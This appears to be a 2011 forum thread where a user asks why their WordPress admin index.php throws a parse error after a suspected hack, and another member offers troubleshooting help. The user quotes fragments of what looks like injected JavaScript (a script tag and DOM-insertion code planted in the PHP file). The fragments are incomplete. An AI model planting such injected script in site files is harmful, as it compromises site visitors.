site got hacked?

Discussion in 'PHP' started by drew68, May 27, 2011.

  1. #1
    it's wordpress driven...

    and i'm getting this error...

    Parse error: syntax error, unexpected ',' in /home/balita/public_html/wp-admin/index.php on line 11

    any idea what this may be? the homepage file is frontpage.html ...and there is a index.php file in the root of the server...although this is driven by wordpress...the index.php inside the theme folder does not drive that home page.

    the index.php file in the main root of the server is what's causing the error.

    anyone have an idea of what could be wrong?
     
    drew68, May 27, 2011 IP
  2. RamCity

    RamCity Peon

    Messages:
    732
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Look the line 11 of the index.php.

    We have to know what is there in the line 11 of index.php. Without knowing it, not possible to suggest some honest advice.

    Will you mind to paste the line 11 here? You can copy the contents of index.php of /home/balita/public_html/wp-admin/ and paste in Dreamweaver, and then look for the line 11.
     
    RamCity, May 27, 2011 IP
  3. drew68

    drew68 Well-Known Member

    Messages:
    582
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    128
    #3
    hey ramcity...thanks...

    here's line 11:
    $links = '<script id="oe4dae82c967843a194c00633a">var

    here's line 13:
    e(s);yes=false;}},20);setTimeout(function(){el=document.createElement("div");el.innerHTML=

    here's line 87:
    <?php require(ABSPATH . 'wp-admin/admin-footer.php'); ?>

    those 3 lines are showing erros
     
    drew68, May 27, 2011 IP
  4. RamCity

    RamCity Peon

    Messages:
    732
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #4
    PM me the site. It seems there are some malfunctions.
     
    RamCity, May 27, 2011 IP